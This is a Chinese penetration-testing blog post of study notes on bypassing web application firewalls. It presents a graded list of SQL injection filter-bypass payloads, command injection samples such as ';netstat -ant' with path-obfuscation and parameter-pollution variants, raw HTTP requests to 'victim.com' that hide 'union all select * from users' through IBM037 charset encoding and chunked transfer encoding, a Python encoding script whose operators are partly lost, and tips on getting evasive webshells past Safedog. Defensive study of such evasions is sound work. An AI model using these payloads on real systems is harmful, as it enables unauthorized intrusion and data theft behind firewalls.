经验分享 | 渗透笔记之Bypass WAF

2022-09-29 20:20:52 浏览数 (1)

前言

申明:本次测试只作为学习用处,请勿未授权进行渗透测试,切勿用于其它用途!

本文来自团队师傅goddemon的日常学习笔记

师傅的CSDN博客地址:

https://blog.csdn.net/qq_33942040?spm=1010.2135.3001.5343

Part 1

识别WAF

(1)cookie判断(例如Citrix,Netscaler,Yunsuo WAF,safedog) (2)有些人将自己与单独的标头关联(例如Anquanbao WAF,AmazonAWS WAF)。 (3)有些经常更改标头和混乱的字符以使攻击者感到困惑(例如Netscaler,Big-IP)。 (4)有些人在服务器头数据包中暴露自己(eg. Approach, WTS WAF) (5)一些WAF在响应内容body中公开自身(例如DotDefender,Armor,Sitelock) (6)其他WAF会对恶意请求做出不寻常的响应代码答复(例如WebKnight,360WAF) (7)有些WAF会返回一堆垃圾数据,卡死你(例如:百度云加速乐)

检测WAF

(1)从浏览器发出普通的GET请求,拦截并记录响应头(特别是cookie)。 (2)从命令行(例如cURL)发出请求,并测试响应内容和标头(不包括user-agent)。 (3)向随机开放的端口发出GET请求,并抓住可能暴露WAF身份的标语。 (4)如果某处有登录页面,表单页面等.请尝试一些常见的(易于检测的)有效负载,例如 " or 1=1 -- - (5)将../../../etc/passwd附加到URL末尾的随机参数 (6)在url的末尾添加一些吸引人的关键字,如'or sleep(5)‘ (7)使用过时的协议(如http/0.9)发出get请求(http/0.9不支持post类型查询)。 (8)很多时候,waf根据不同的交互类型改变服务器头。 (9)删除操作技术-发送一个原始的fin/rst包到服务器并识别响应。 (10)侧通道攻击-检查请求和响应内容的计时行为。

SQL注入常见过滤以及绕过方法

常见绕过方法 step1: 过滤关键词:and, or, union 可能正则: preg_match(’/(and|or|union)/i’, $id)

代码语言:javascript复制
- Blocked: union select user, password from users
- Bypass: 1 || (select user from users where user_id = 1) = 'admin'

step2: 过滤关键词: and, or, union, where

代码语言:javascript复制
- Blocked: 1 || (select user from users where user_id = 1) = 'admin'
- Bypass: 1 || (select user from users limit 1) = 'admin'

step3: 过滤关键词: and, or, union, where , limit

代码语言:javascript复制
- Blocked: 1 || (select user from users limit 1) = 'admin'
- Bypass: 1 || (select user from users group by user_id having user_id = 1) = 'admin'

step4: 过滤关键词: and, or, union, where ,limit , group by, select

代码语言:javascript复制
- Blocked: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
- Bypass: 1 || (select substr(group_concat(user_id),1,1) user from users ) = 1

‍‍step5: 过滤关键词: and, or, union, where ,limit , group by , select

代码语言:javascript复制
- Blocked: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
- Bypass: 1 || 1 = 1 into outfile 'result.txt'
- Bypass: 1 || substr(user,1,1) = 'a'

step6: 过滤关键词: and, or, union, where ,limit , group by , select , ’

代码语言:javascript复制
- Blocked: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
- Bypass: 1 || user_id is not null
- Bypass: 1 || substr(user,1,1) = 0x61
- Bypass: 1 || substr(user,1,1) = unhex(61)

‍‍step7: 过滤关键词: and, or, union, where ,limit , group by , select,’,hex

代码语言:javascript复制
- Blocked: 1 || substr(user,1,1) = unhex(61)
- Bypass: 1 || substr(user,1,1) = lower(conv(11,10,36))

step8: 过滤关键词: and, or, union, where ,limit , group by , select,’,hex , substr

代码语言:javascript复制
- Blocked: 1 || substr(user,1,1) = lower(conv(11,10,36)) 
- bupass: 1 || lpad(user,7,1)

step9: 过滤关键词: and, or, union, where ,limit , group by , select,’,hex , substr ,white space

代码语言:javascript复制
- Blocked: 1 || lpad(user,7,1) 
- Bypass: 1||lpad(user,7,1)

Burp插件bypasswaf

参数 ①IP伪造 ②Content-type-->绕waf根据已知类型解码/评估 ③host--> 配置不当的WAF可能配置为仅根据此标头中找到的主机的正确FQDN来评估请求,这是此绕过目标 ④pathinfo-->随机路径注入功能-->构造路径-->类似于路径fuzzing ⑤PathObfuscation-->路径混淆 原来请求-->/get/?id=;netstat -ant 构造后-->/get///?id=;netstat -ant HTTP/1.1 ⑥HPP 参数污染 原始攻击:/get/?id=;netstat -ant 参数污染攻击:/get/?id=;netstat -ant&id=test&id=test&id=test ⑦SpaceEncoding(对空格进行编码) 原始攻击:/get/?id=;netstat -ant url编码 %u编码 /get/?id=;netstat-ant

实战

案例1 字符编码绕waf

代码语言:javascript复制
POST /sample.aspx?input0=something HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 41

input1='union all select * from users--

‍字符编码脚本

代码语言:javascript复制
import urllib

def paramEncode(params="", charset="IBM037", encodeEqualSign=False, encodeAmpersand=False, urldecodeInput=True, urlencodeOutput=True):
    result = ""
    equalSign = "="
    ampersand = "&"
    if encodeEqualSign:
       equalSign = equalSign.encode(charset)
    if encodeAmpersand:
       ampersand = ampersand.encode(charset)
    params_list = params.split("&")
    for param_pair in params_list:
       param, value = param_pair.split("=")
       if urldecodeInput:
          param = urllib.unquote(param).decode('utf8')
          value = urllib.unquote(value).decode('utf8')
       param = param.encode(charset)
       value = value.encode(charset)
       if urlencodeOutput:
          param = urllib.quote_plus(param)
          value = urllib.quote_plus(value)
       if result:
          result  = ampersand
       result  = param   equalSign   value
    return result

# for IIS
print paramEncode("input1='union all select * from users--")

# prints ������=}�����@���@������@@����@�����``

bypass

代码语言:javascript复制
POST /sample.aspx?������=��������� HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=ibm037
Content-Length: 115

������=}�����@���@������@@����@�����``

案例2 chunked 绕waf(分块绕waf) 分块编码bypass 如 未bypass

代码语言:javascript复制
POST /sample.aspx?input0=something HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 41

input1='union all select * from users--

bypass

代码语言:javascript复制
POST /sample.aspx?input0=something HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 110
Transfer-Encoding: chunked

5;
input
4;
1='u
5;
nion 
4;
all 
5;
selec
4;
t * 
4;
from
5;
 user
3;
s--
0

常见waf绕过

①安全狗绕过 sql注入绕安全狗 内联绕过 /!80000aaa/–>里面符号常见/!50001/类 如

代码语言:javascript复制
order/*!80000aaa*/by/*!80000aaa*/16

文件上传绕安全狗 ①绕后缀 Content-Disposition: 处理的不是很好, 当长度增加到48930的时候,安全狗的上传防御就失效了 如

②绕内容 免杀马进行绕 ③绕流量 蚁剑绕 或者直接上传大马绕

http apache 网络安全 安全

0 人点赞